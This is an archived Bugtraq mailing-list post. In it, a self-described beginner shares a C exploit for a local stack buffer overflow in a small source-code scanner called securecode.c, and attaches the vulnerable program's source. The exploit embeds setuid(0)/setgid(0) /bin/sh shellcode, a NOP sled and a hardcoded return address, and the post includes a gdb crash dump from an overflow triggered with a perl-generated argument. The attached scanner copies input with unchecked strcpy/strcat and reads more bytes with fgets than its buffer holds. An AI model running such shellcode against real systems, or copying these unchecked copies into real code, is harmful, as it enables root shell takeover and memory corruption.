Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: General :: bt496.txt

hello-exploit.c





--------------080601020306010909000109
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Hello ppl!! This is my debut on bugtraq!!
A few days ago someone posted a vulnerability in securecode.c (from 
Tidbit^H^H^HTripBit) ...
Anyway I decided to code the exploit  for learning purposes... (this is 
my first exploit!!) Have fun!!

(note: you can't take over the world with this exploit....)
(Another note: I couldn't overwrite eip with the first strcpy... but I 
could overwrite eax.... :\
    I would really enjoy it if someone explained that to me!)

./securecode -s `perl -e 'print "A"x"2000"'`

gives me the following registers:

Program received signal SIGSEGV, Segmentation fault.
0x080485e5 in main ()
(gdb) info reg
eax            0x41414141       1094795585
ecx            0x40154360       1075135328
edx            0x5050504        84215044
ebx            0x40155f50       1075142480
esp            0xbfffec50       0xbfffec50
ebp            0xbffff068       0xbffff068
esi            0x40012780       1073817472
edi            0xbffff0b4       -1073745740
eip            0x80485e5        0x80485e5
eflags         0x210286 2163334
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
mxcsr          0x1f80   8064
orig_eax       0xffffffff       -1

Thank you for your help!!



In Memory of PoD   (not the band or whatever)

PS: Sorry... I put TidBit instead of TripBit   (man... I prolly offended 
someone!!)

--------------080601020306010909000109
Content-Type: text/plain;
 name="hello-xp.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="hello-xp.c"

 /* securecode-xp.c
 * 
 *  Vuln: securecode.c //Your know... the one from tidbit...
 *  Info: Program to check for vulns in source code...
 *  Vuln author: Someone else... 
 *  Exploit author: Lucas G. 
 *  Impact: it helped me learn... other than that, almost useless
 *  
 *  Compiling: gcc seccode.c -o seccode
 *  Usage: ./seccode
 *
 *  Tips Make sure the securecode.c program is in the same directory AND
 *  has the same as I have it in the exploit ie:
 *  
 *    execl("./securecode", "securecode","-s","bigbuff", 0);
 *
 *  Credits: 	teleh0r (for his wonderful tutorial bof4kids!
 *  	     	teleh0r for his code that I modiffied.... (thought the
 *  	     code looked familiar?)
 *  	     	Shell coder possibly by c0ntex
 *
 * */
#include <stdio.h>

                    /* kode ripped from kon2.c */

char codez[] =
  /* setuid(0); */
  "\x31\xdb"			/* xor %ebx,%ebx */
  "\x89\xd8"			/* mov %ebx,%eax */
  "\xb0\x17"			/* mov $0x17,%al */
  "\xcd\x80"			/* int $0x80     */
  /* setgid(0); */
  "\x31\xdb"			/* xor %ebx,%ebx */
  "\x89\xd8"			/* mov %ebx,%eax */
  "\xb0\x2e"			/* mov $0x2e,%al */
  "\xcd\x80"			/* int $0x80     */
  /* /bin/sh execve(); */
  "\x31\xc0"			/* xor  %eax,%eax   */
  "\x50"			/* push %eax        */
  "\x68\x2f\x2f\x73\x68"	/* push $0x68732f2f */
  "\x68\x2f\x62\x69\x6e"	/* push $0x6e69622f */
  "\x89\xe3"			/* mov  %esp,%ebx   */
  "\x50"			/* push %eax        */
  "\x53"			/* push %ebx        */
  "\x89\xe1"			/* mov  %esp,%ecx   */
  "\x31\xd2"			/* xor  %edx,%edx   */
  "\xb0\x0b"			/* mov  $0xb,%al    */
  "\xcd\x80"			/* int  $0x80       */
  /* exit(0); */
  "\x31\xdb"			/* xor %ebx,%ebx */
  "\x89\xd8"			/* mov %ebx,%eax */
  "\xb0\x01"			/* mov $0x01,%al */
  "\xcd\x80";			/* int $0x80     */

#define NOP     0x90
#define LEN     289 
#define RET     0xbffff314 //Mandrake 9.1 offset

int main(int argc, char *argv[]) {

    char buffer[LEN];
    long retaddr, offset;
    int i;
    FILE *fp;

    offset = 0;
    if (argc > 1) {
	offset = atol(argv[1]);
    }
    retaddr = RET + offset;

    printf("\n Modified by j0e! Original code from:");
    printf("\n- (c) teleh0r@doglover.com anno 2000 -\n");
    printf("Use : %s [offset] \n", argv[0]);
    printf("Using: address 0x%lx\n\n", retaddr);

    for (i = 0; i < LEN; i += 4)
	*(long *) &buffer[i] = retaddr;
/*The greater the NUM of strlen(codez) - NUM, the more return addresses are 
 * put at the end (and less NOPS in the beggining*/
    for (i = 0; i < (LEN - strlen(codez)-40); ++i)
	*(buffer + i) = NOP;

    memcpy(buffer + i, codez, (strlen(codez)));
    fp = fopen("bigbuff", "w");
    fprintf(fp, "%s",buffer);
    fclose(fp);
    execl("./securecode", "securecode","-s","bigbuff", 0);

    return 0;
}

--------------080601020306010909000109
Content-Type: text/plain;
 name="securecode.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="securecode.c"

/*
*   Secure Code Analizer v1.0
*   
*   Tripbit Security Development
*   Author: posidron
*   Website: tripbit.org   
*
*
*   ABOUT
*
*   This tool scans your source code to different dangerous functions, 
*   like strcpy(), gets(), getenv(), sscanf() etc.
*
*
*   OPTIONS
*
*   [+] single source file   -s [SOURCE_FILE]
*
*   
*   FEATURES
*
*   [+] several source files -m [SOURCE_FILE, SOURCE_FILE ... ]
*
*
*   GREETS
*   
*   #hackerboard, #csec, #tripbit
*
*/

#include <stdio.h>
#define FALSE 0
#define TRUE  1

int getopt(char *, char *);
int single_source(char *);
void help(char *);
void version();

int main(int argc, char *argv[])
{
    int counter=3;
    char buffer[1024];
    
    if(argc == 1 || getopt(argv[1],"h") == TRUE ) { help(argv[0]); }
    else if(getopt(argv[1],"v") == TRUE) { version(); }
    else if(argc < 3) { help(argv[0]); }

    strcpy(buffer,argv[2]);
    printf("%s",buffer);
    while(argv[counter]!=NULL)
    {
        strcat(buffer, " ");
        strcat(buffer, argv[counter++]);
    }
    
    if(getopt(argv[1],"s") == TRUE)
       single_source(buffer);
    
    return 0;
}


int getopt(char *argument,char *option)
{
    if( argument[0]=='-' && argument[1]==option[0] )
        return TRUE;
            return FALSE;
}

int single_source(char *buffer)
{ 
    char puffer[256];
    int counter = 1;
    FILE *source_file;
    source_file = fopen(buffer, "rt");
    
    if(!source_file)
       perror("Unable to open file!\n");
    else
    {
        printf("File to open: %s\n\n", buffer);
        printf("Please wait...\n\n");
     
        while(fgets(puffer, 1044, source_file) != NULL)
        {
            if(strstr(puffer, "strcpy") != NULL)
            {
                printf("Line %d, strcpy() function was found, potential buffer overflow attack!\n", counter);
                printf("   Syntax: char * strcpy ( char * dest, const char * src );\n\n");
            }
            else if(strstr(puffer, "scanf") != NULL)
            {
                printf("Line %d, scanf() function was found, potential buffer overflow attack!\n", counter);
                printf("   Syntax: int scanf ( const char * format, ... );\n\n"); 
            }
            else if(strstr(puffer, "gets") != NULL)
            {
                printf("Line %d, gets() function was found!, potential buffer overflow attack!\n", counter);
                printf("   Syntax: char * gets( char * str );\n\n");
            }
            else if(strstr(puffer, "fscanf") != NULL)
            {
                printf("Line %d, fscanf() function was found, potential buffer overflow attack!\n", counter);
                printf("   Syntax: int fscanf ( FILE * stream, const char * format, ... );\n\n");
            }
            else if(strstr(puffer, "fgets") != NULL)
            {
                printf("Line %d fgets() function was found, potential buffer overflow attack!\n", counter);
                printf("   Syntax: char * fgets ( char * str, int n, FILE * stream );\n\n"); 

            }
            else if(strstr(puffer, "setenv") != NULL)
            {
                printf("Line %d setenv() function was found, potential buffer overflow attack!\n", counter);
                printf("   Syntax: int setenv ( const char * name, const char * value, int overwrite );\n\n");
            }
            else if(strstr(puffer, "getenv") != NULL)
            {
                printf("Line %d getenv() function was found, potential buffer overflow attack!\n", counter);
                printf("   Syntax: char * getenv( const char * name );\n\n"); 
            }
            else if(strstr(puffer, "sscanf") != NULL)
            {
                printf("Line %d sscanf() function was found, potential buffer overflow attack!\n", counter);
                printf("   Syntax: int sscanf ( const char * str, const char * format, ... );\n\n"); 
            }
            else if(strstr(puffer, "strcat") != NULL)
            {
                printf("Line %d strcat() function was found, potential buffer overflow attack!\n", counter);
                printf("    Syntax: char *  strcat ( char * dest, const char * src );\n\n");
            }
            else if(strstr(puffer, "fprintf") != NULL)
            {
                printf("Line %d fprintf() function was found, potential formatstring attack!\n", counter);
                printf("   Syntax: int fprintf ( FILE * stream, const char * format, ... );\n\n"); 
            }
            else if(strstr(puffer, "sprintf") != NULL)
            {
                printf("Line %d sprintf() function was found, potential formatstring attack!\n", counter);
                printf("   Syntax: int sprintf ( char * str, const char * format, ... );\n\n"); 
            }
            else if(strstr(puffer, "snprintf") != NULL)
            {
                printf("Line %d snprintf() function was found, potential formatstring attack!\n", counter);
                printf("   Syntax: int snprintf ( char *str, size_t n, const char * format, ... );\n\n"); 
            }
            else if(strstr(puffer, "system") != NULL)
            {
                printf("Line %d system() function was found, potential formatstring attack!\n", counter);
                printf("   Syntax: int system ( const char * string );\n\n");
            }
            else if(strstr(puffer, "syslog") != NULL)
            {
                printf("Line %d syslog() function was found, potential formatstring attack!\n", counter);
                printf("   Syntax: void syslog ( int priority, const char * message, ...)\n\n");

            }
            else if(strstr(puffer, "vsprintf") != NULL)
            {
                printf("Line %d vsprintf() function was found, potential formatstring attack!\n", counter);
                printf("   Syntax: int vsprintf ( const char * buf, const char * format, va_list ap);\n\n");
            }
            else if(strstr(puffer, "vsnprintf") != NULL)
            {
                printf("Line %d vsnprintf() function was found, potential formatstring attack!\n", counter);
                printf("   Syntax: int vsnprintf ( char * str, size_t n, const char * format, va_list ap);\n\n");
            }
            else if(strstr(puffer, "popen") != NULL)
            {
                printf("Line %d popen() function was found, potential formatstring attack!\n", counter);
                printf("   Syntax: FILE* popen ( const char * command, const char * mode );\n\n");
            }
            counter++;
        }
        if(counter == 1) printf("Nothing was found!\n");
    }
    
    fclose(source_file);
    
    printf("\nThe scan has finished!\n");
    
    return 0;
}

void help(char *file_name)
{
    printf("Usage: securecode [OPTION] [SPECIFICATION]\n");
    printf("[+] single source file       -s [SOURCE_FILE]\n");
    exit(0);
}

void version()
{
    printf("Secure Code Analizer [Version 1.0a] \n(C) Copyright 2003 Tripbit Security Development\n");
    exit(0);
}

--------------080601020306010909000109--


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH